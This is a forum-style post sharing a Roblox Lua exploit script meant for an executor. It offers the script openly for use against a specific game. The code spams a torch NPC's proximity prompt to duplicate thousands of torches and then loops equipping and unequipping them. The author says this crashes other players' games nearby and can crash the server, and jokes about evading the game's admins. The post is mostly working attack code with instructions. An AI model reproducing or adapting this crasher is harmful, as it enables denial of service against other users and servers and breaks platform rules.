Description
hi chat cool script i made when krampus didnt discontinue ts prob gonna be patched in a few days so do what you wanna do
TORCH NPC IS INFRONT OF SPAWN
set the amount to how much torches you want
1000 – avg
2500 – good
10000 – prob too much takes like 5 minutes to get that much but crashes the server
instruction in the script (open source)
crashes people game when your near them
(and the game has a shitload of admins so be careful i guess)
also crashes your game if you put too much but just reset/rejoin to disable
anyways do what you wanna do lol
-- INSTRUCTION: 1. go near torch npc 2. execute script 3. wait 4. watch them crash
local amount = 2500 -- how much u wanna dupe (higher the better but you will also crash, lower the better you wont crash, but the others might just not crash)
local x = 0
local lp = game.Players.LocalPlayer
local crasher = true -- enable crasher
if crasher == true then
while x < amount do
fireproximityprompt(workspace.allthings.Character[" "].Part.ProximityPrompt)
x = x + 1
task.wait(1/100)
end
end
task.wait(1)
for i,v in pairs(game.Players.LocalPlayer:FindFirstChildOfClass("Backpack"):GetChildren()) do
if v:IsA("Tool") and v.Name == "Torch" then
v.Fuel:Destroy()
v.Effects:Destroy()
v.Part:Destroy()
v.Part:Destroy()
v.Handle:Destroy()
end
end
while crasher == true do
for i,v in pairs(lp:FindFirstChildOfClass("Backpack"):GetChildren()) do
if v:IsA("Tool") and v.Name == "Torch" then
v.Parent = lp.Character
end
end
task.wait(1.1)
lp.Character:FindFirstChildOfClass('Humanoid'):UnequipTools()
task.wait(1.1)
end